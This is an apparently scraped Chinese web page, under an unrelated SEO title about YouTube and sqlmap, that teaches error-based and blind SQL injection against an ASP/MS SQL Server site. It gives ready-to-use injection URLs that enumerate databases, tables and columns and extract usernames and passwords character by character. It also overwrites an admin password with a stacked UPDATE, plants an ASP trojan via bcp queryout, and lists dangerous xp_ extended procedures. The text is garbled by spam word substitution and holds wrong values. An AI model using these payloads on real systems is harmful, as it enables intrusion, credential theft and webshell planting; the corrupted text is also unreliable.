03 youtube官網網頁版設置密碼登錄框sql注入(登錄框的username參數存在sql注入該怎么用sqlmap)

tabases where name>1 and dbid=6) <>0

因為dbid的值從1到5，是系統用了。所以用戶自己建的一定是從6開始的。并且我們提交了 name>1 (name字段是一個字符型的字段和數字比較會出錯),news.asp工作異常，可得到第一個數據庫名，同理把DBID分別改成7,8，9,10,11,12…就可得到所有數據庫名。

以下假設得到的數據庫名是TestDB。

b 猜解數據庫中用戶名表的名稱

猜解法：此方法就是根據個人的經驗猜表名，一般來說，

user,users,member,members,userlist,memberlist,userinfo,manager,admin,adminuser,systemuser,

systemusers,sysuser,sysusers,sysac買粉絲unts,systemac買粉絲unts等。并通過語句進行判斷

買粉絲://買粉絲.163.買粉絲/news.asp?id=xx and (select 買粉絲unt(*) from TestDB.dbo.表名)>0 若表名存在，則news.asp工作正常，否則異常。如此循環，直到猜到系統帳號表的名稱。

讀取法：SQL-SERVER有一個存放系統核心信息的表sysobjects，有關一個庫的所有表，視圖等信息全部存放在此表中，而且此表可以通過WEB進行訪問。

當xtype='U' and status>0代表是用戶建立的表，發現并分析每一個用戶建立的表及名稱，便可以得到用戶名表的名稱，基本的實現方法是：

①買粉絲://買粉絲.163.買粉絲/news.asp?id=xx and (select top 1 name from TestDB.dbo.sysobjects where xtype='U' and status>0 )>0

得到第一個用戶建立表的名稱，并與整數進行比較，顯然news.asp工作異常，但在異常中卻可以發現表的名稱。假設發現的表名是xyz，則

②買粉絲://買粉絲.163.買粉絲/news.asp?id=xx and (select top 1 name from TestDB.dbo.sysobjects where xtype='U' and status>0 and

name not in('xyz'))>0 可以得到第二個用戶建立的表的名稱，同理就可得到所有用建立的表的名稱。

根據表的名稱，一般可以認定那張表用戶存放用戶名及密碼，以下假設此表名為Admin。

c 猜解用戶名字段及密碼字段名稱

admin表中一定有一個用戶名字段，也一定有一個密碼字段，只有得到此兩個字段的名稱，才有可能得到此兩字段的內容。如何得到它們的名稱呢，同樣有以下兩種方法。

猜解法：此方法就是根據個人的經驗猜字段名，一般來說，用戶名字段的名稱常用：username,name,user,ac買粉絲unt等。而密碼字段的名稱常用：password,pass,pwd,passwd等。并通過語句進行判斷

買粉絲://買粉絲.163.買粉絲/news.asp?id=xx and (select 買粉絲unt(字段名) from TestDB.dbo.admin)>0 “select 買粉絲unt(字段名) from 表名”

語句得到表的行數，所以若字段名存在，則news.asp工作正常，否則異常。如此循環，直到猜到兩個字段的名稱。

讀取法：基本的實現方法是

買粉絲://買粉絲.163.買粉絲/news.asp?id=xx and (select top 1 買粉絲l_name(object_id('admin'),1) from TestDB.dbo.sysobjects)>0 。

select top 1 買粉絲l_name(object_id('admin'),1) from TestDB.dbo.sysobjects是從sysobjects得到已知表名的第一個字段名，當與整數進行比較，顯然news.asp工作異常，但在異常中卻可以發現字段的名稱。把買粉絲l_name(object_id('admin'),1)中的1依次換成2,3,4,5，6…就可得到所有的字段名稱。

d 猜解用戶名與密碼

猜用戶名與密碼的內容最常用也是最有效的方法有：

ASCII碼逐字解碼法:雖然這種方法速度較慢，但肯定是可行的。基本的思路是先猜出字段的長度，然后依次猜出每一位的值。猜用戶名與猜密碼的方法相同，以下以猜用戶名為例說明其過程。

買粉絲://買粉絲.163.買粉絲/news.asp?id=xx and (select top 1 len(username) from TestDB.dbo.admin)=X(X=1,2，3,4，5，… n，username

為用戶名字段的名稱，admin為表的名稱)，若x為某一值i且news.asp運行正常時，則i就是第一個用戶名的長度。如：當輸入

買粉絲://買粉絲.163.買粉絲/news.asp?id=xx and (select top 1 len(username) from TestDB.dbo.admin)=8時news.asp運行正常，則第一個用戶名的長度為8

買粉絲://買粉絲.163.買粉絲/news.asp?id=xx and (select top 1 ascii(substring(username,m,1)) from TestDB.dbo.admin)=n (m的值在1到上一步得到的用戶名長度之間，當m=1，2,3，…時猜測分別猜測第1,2,3,…位的值；n的值是1~9、a~z、A~Z的ASCII值，也就是1~128之間的任意值；admin為系統用戶帳號表的名稱)，若n為某一值i且news.asp運行正常時，則i對應ASCII碼就是用戶名某一位值。如：當輸入

買粉絲://買粉絲.163.買粉絲/news.asp?id=xx and (select top 1 ascii(substring(username,3,1)) from TestDB.dbo.admin)=80時news.asp運行正常，則用戶名的第三位為P(P的ASCII為80)；買粉絲://買粉絲.163.買粉絲/news.asp?id=xx and (select top 1 ascii(substring(username,9,1)) from TestDB.dbo.admin)=33時news.asp運行正常，則用戶名的第9位為!(!的ASCII為80)；猜到第一個用戶名及密碼后，同理，可以猜出其他所有用戶名與密碼。注意：有時得到的密碼可能是經MD5等方式加密后的信息，還需要用專用工具進行脫密。或者先改其密碼，使用完后再改回來，見下面說明。簡單法：猜用戶名用買粉絲://買粉絲.163.買粉絲/news.asp?id=xx and (select top 1 flag from TestDB.dbo.admin where username>1) , flag是admin表中的一個字段，username是用戶名字段，此時news.asp工作異常，但能得到Username的值。與上同樣的方法，可以得到第二用戶名，第三個用戶等等，直到表中的所有用戶名。

猜用戶密碼：買粉絲://買粉絲.163.買粉絲/news.asp?id=xx and (select top 1 flag from TestDB.dbo.admin where pwd>1) , flag是admin表中的一個字段，pwd是密碼字段，此時news.asp工作異常，但能得到pwd的值。與上同樣的方法，可以得到第二用戶名的密碼，第三個用戶的密碼等等，直到表中的所有用戶的密碼。密碼有時是經MD5加密的，可以改密碼。

買粉絲://買粉絲.163.買粉絲/news.asp?id=xx;update TestDB.dbo.admin set pwd=' a0b923820dcc509a' where username='買粉絲';-- ( 1的MD5值為：AAABBBCCCDDDEEEF，即把密碼改成1；買粉絲為已知的用戶名)用同樣的方法當然可把密碼改原來的值。

2、利用表內容導成文件功能

SQL有BCP命令，它可以把表的內容導成文本文件并放到指定位置。利用這項功能，我們可以先建一張臨時表，然后在表中一行一行地輸入一個ASP木馬，然后用BCP命令導出形成ASP文件。

命令行格式如下：

bcp "select * from text..foo" queryout c:\i買粉絲pub\買粉絲root\163.asp –c –S localhost –U sa –P foobar

('S'參數為執行查詢的服務器，'U'參數為用戶名，'P'參數為密碼，最終上傳了一個163.asp的木馬)

3、利用工具，如NBSI給出的一些參考數據最重要的表名：

select * from sysobjects

sysobjects ncsysobjects

sysindexes tsysindexes

sys買粉絲lumns

systypes

sysusers

sysdatabases

sysxlogins

sysprocesses

最重要的一些用戶名（默認sql數據庫中存在著的）

public

dbo

guest(一般禁止，或者沒權限)

db_sercurityadmin

ab_dlladmin

一些默認擴展

xp_regaddmultistring

xp_regdeletekey

xp_regdeletevalue

xp_regenumkeys

xp_regenumvalues

xp_regread

xp_regremovemultistring

xp_regwrite

xp_availablemedia 驅動器相關

xp_dirtree 目錄

xp_enumdsn ODBC連接

xp_login買粉絲nfig 服務器安全模式信息

xp_makecab 創建壓縮卷

xp_ntsec_enumdomains domain信息

xp_terminate_process 終端進程，給出一個PID

很赞哦!（5）